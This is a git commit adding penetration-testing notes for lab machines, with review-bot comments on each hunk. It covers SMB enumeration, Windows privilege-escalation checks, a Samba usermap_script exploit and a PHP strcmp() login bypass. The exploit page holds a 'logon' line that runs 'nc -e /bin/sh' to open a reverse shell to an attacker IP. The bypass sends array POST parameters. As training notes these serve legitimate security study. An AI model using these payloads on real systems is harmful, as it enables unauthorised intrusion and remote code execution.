smb exploit

Stefan Etringer 2022-12-29 01:37:26 +01:00
parent a5b29def31
commit 24937f7d68
10 changed files with 1249 additions and 0 deletions

File diff suppressed because it is too large

@ -1,3 +1,16 @@
# SMB
## SMBClient
* Use `smbclient` to list the share
```sh
smbclient -L //$TARGET_IP/
```
* The protocol might be dated, try
```sh
smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
```
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
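Review bot: `# smbmap` is added as a top-level heading, while `## SMBClient` sits one level below `# SMB`; make it `## smbmap` so both tools are grouped under the SMB page. The first bullet says "list the share", but `-L` lists the shares a host offers, so the plural would be more accurate. The `client min protocol=NT1` bullet would benefit from a short remark that NT1 is SMB1, so a host that only answers with this option is itself a finding worth recording.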

@ -70,3 +70,23 @@ wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```
### Scheduled Services
* Check which services are scheduled via
```sh
schtasks
```
* Powershell's equivalent to scheduled tasks therefore is
```sh
ps
```
## Files
### Group permissions
* Check modification permissions on files and if the current user is able to modify via
```sh
whoami /all
icacls <filename>
```
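Review bot: the bullet "Powershell's equivalent to scheduled tasks therefore is" followed by `ps` is wrong: in PowerShell `ps` is an alias for `Get-Process` and lists running processes, not scheduled tasks. The cmdlet that corresponds to `schtasks` is `Get-ScheduledTask`. The heading "Scheduled Services" also mixes two things, since `schtasks` lists scheduled tasks and not services; "Scheduled Tasks" would match the command. The `sh` fence tag on these Windows commands is a minor style point.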

@ -0,0 +1,11 @@
# SMB Exploits
## usermap_script.rb
There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
Since the automated exploit does not work, log in anonymously without an account and do the following
```sh
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
```
A connection to the root shell is provided.
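Review bot: the `logon` line hardcodes `10.10.17.20` and port `4444`, which are values from one lab session; the SMB page in this commit uses `$TARGET_IP`, so placeholders in the same style (for example `$ATTACKER_IP` and `$PORT`) would keep the notes reusable. The quoting in the title is unbalanced (`'Username' map script'`), and "log in anonymously without an account" says the same thing twice. The closing sentence "A connection to the root shell is provided" leaves the cause unexplained; one line stating that the username value is handed to a shell on the server, and that the title gives 3.0.25rc3 as the end of the affected range, would make the note useful for remediation as well.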

@ -0,0 +1,20 @@
# PHP strcmp() bypass
Given a `strcmp()` of a variable and a POST parameter value that looks like this
```php
[...]
if (strcmp($username, $_POST['username']) == 0) {
if (strcmp($password, $_POST['password']) == 0) {
[...]
```
If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
```http
username=admin&password=admin
```
to
```http
username[]=admin&password[]=admin
```
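Review bot: the sentence "If `$username` and `$password` are an array" names the wrong operands: the stored `$username` and `$password` stay strings, and it is `$_POST['username']` and `$_POST['password']` that arrive as arrays when the request uses `username[]=`. The reason the check passes is also missing: before PHP 8, `strcmp()` given an array returns `NULL` with a warning, and `NULL == 0` is true under loose comparison; from PHP 8 the call throws a `TypeError` instead. Please add that, plus the fix (reject non-string input and compare with `===`, or use `hash_equals()` for the password), and complete the sentence starting "Using a Burpsuite Proxy", which has no main clause.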

@ -8,6 +8,7 @@ There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
## Document Type Definition (DTD)
A DTD defines the structure and the legal elements and attributes of an XML document.
* Example file content of `note.dtd`
@ -37,6 +38,7 @@ A DTD defines the structure and the legal elements and attributes of an XML docu
```
## Replacing XML content
* Name in the example
```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>

@ -1,3 +1,4 @@
# Miscellaneous References
## Static Binaries
[andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git)
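Review bot: the link text "andrew-d's statically compiles binary compilation" is garbled; "andrew-d's statically compiled binaries" reads as intended. Since the target is a repository of prebuilt binaries, consider adding a remark to record the commit and a checksum of any binary taken from it.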

@ -2,6 +2,7 @@
[pentestmonkey's PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell.git)
[ivak-sincek's php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell.git)
[Impacket psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)
## Generators
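Review bot: the `psexec.py` link points at the `master` branch, so the referenced file can change or move; link a tag or commit instead. It is also listed directly under two PHP reverse shell links without a heading of its own, although it is not a PHP shell. In the line above it, the link text `ivak-sincek` does not match the repository owner `ivan-sincek` in the URL.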